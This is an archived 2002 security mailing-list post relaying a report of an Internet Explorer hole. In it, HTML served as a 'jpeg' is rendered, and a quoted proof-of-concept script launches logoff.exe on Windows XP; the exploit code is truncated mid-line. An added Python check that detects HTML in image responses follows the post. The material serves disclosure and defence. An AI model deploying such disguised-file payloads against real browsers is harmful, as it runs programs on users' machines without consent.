From: NoCoNFLiC (noconcastleblack.darkflame.net)
Date: Fri Mar 15 2002 - 17:49:31 CST


    [magnusbodin.org] Tue, Mar 12, 2002 at 11:32:20AM +0100 wrote:
    >
    > The latest MSIE-hole is now spreading.
    >
    > THE ATTACHED HTML-code is served as a jpeg-file, and as MSIE ignores the
    > Content-Type if it "thinks" it knows better, then the code is executed.
    > This in combination with the malicious code that is possible to run, then
    > an "innocent.jpg" with the following content will log off an XP-user.
    >
    > --%< cut here-----
    > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    > <HTML>
    > <HEAD>
    > <TITLE>IE6 security...</TITLE>
    >
    > <META http-equiv=Content-Type content="text/html; charset=windows-1252">
    > <SCRIPT language=JScript>
    >
    > var programName=new Array(
    > 'c:/windows/system32/logoff.exe',
    > 'c:/winxp/system32/logoff.exe',
    > 'c:/winnt/system32/logoff.exe'
    > );
    >
    > function Init(){
    > var oPopup=window.createPopup();
    > var oPopBody=oPopup.document.body;
    > var n,html='';
    > for(n=0;n<programName.length;n++)
    > html+="<OBJECT NAME='X'
    > CLASSID='CLSID:11111111-1111-1111-1111-111111111111' C
    > oPopBody.innerHTML=html;
    > oPopup.show(290, 390, 200, 200, document.body);
    > }
    >
    > </SCRIPT>
    > </head>
    > <BODY onload="Init()">
    > You should feel lucky if you dont have XP right now.
    > </BODY>
    > </HTML>
    > --%< cut here-----
    >
    >
    > --
    > magnus MICROS~1 BOB was written in Lisp.
    > http://x42.com/

       Just passing this along, as some may not be on the sec-basics list.

    -----Original Message-----
    From: Sprissler, Noah [mailto:NSPRISSLERPARTNERS.ORG]
    Sent: March 12, 2002 10:31
    To: security-basicssecurity-focus.com
    Subject: RE: scary site

    That's interesting. I have disabled active scripting as most have suggested
    and the http://www.liquidwd.freeserve.co.uk/ link stops bringing up a DOS
    prompt. However, if I go to this link from Greymagic
    http://security.greymagic.com/adv/gm001-ie/simplebind.html their
    implementation of this works fine no matter what settings I disable. Win2k
    with all patches, IE6 with all patches.

    -Noah

    -----Original Message-----

    -- 
    

    - nocon

    ======================================

    nocondarkflame.net http://nocon.darkflame.net

    ======================================
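
Added example, not part of the original messages: a defensive check for the mismatch described in the quoted report, where a body labelled as a JPEG actually contains HTML that a content-sniffing browser will render. The function names, the marker list, the 256-byte window and the sample bytes are assumptions constructed for illustration; the `X-Content-Type-Options: nosniff` header is honoured by later browsers (IE8 onward), not by the versions discussed in this thread.

```python
import re

# Tags that make a body look like HTML to a content sniffer (constructed list).
HTML_MARKERS = re.compile(
    rb"<\s*(!doctype\s+html|html|head|body|script|title|object|meta|iframe)\b",
    re.IGNORECASE,
)
SNIFF_WINDOW = 256          # assumption: only the leading bytes are inspected
JPEG_SOI = b"\xff\xd8\xff"  # JPEG start-of-image marker

# Constructed, harmless sample inputs.
HTML_AS_JPEG = (b'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">\n'
                b"<HTML><BODY>hello</BODY></HTML>")
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
POLYGLOT = JPEG_SOI + b"\xe0" + b"<script>/* inert */</script>"


def audit_image_response(declared_type, body):
    """Return a list of findings for a body declared as an image."""
    findings = []
    if declared_type.lower().startswith("image/jpeg") and not body.startswith(JPEG_SOI):
        findings.append("declared image/jpeg but JPEG SOI marker is missing")
    match = HTML_MARKERS.search(body[:SNIFF_WINDOW])
    if match:
        tag = match.group(0).decode("ascii", "replace")
        findings.append("HTML markup in leading bytes: " + tag)
    return findings


def hardened_headers(declared_type):
    """Response headers telling supporting browsers to honour the declared type."""
    return {
        "Content-Type": declared_type,
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    for name, body in [("html-as-jpeg", HTML_AS_JPEG),
                       ("real-jpeg", REAL_JPEG),
                       ("polyglot", POLYGLOT)]:
        print(name, audit_image_response("image/jpeg", body) or "clean")
    print(hardened_headers("image/jpeg"))
```

Run the audit on uploads before they are stored and on anything a server is about to emit with an `image/*` type; a body that passes the magic-byte test but still carries markup (the polyglot case) is flagged separately.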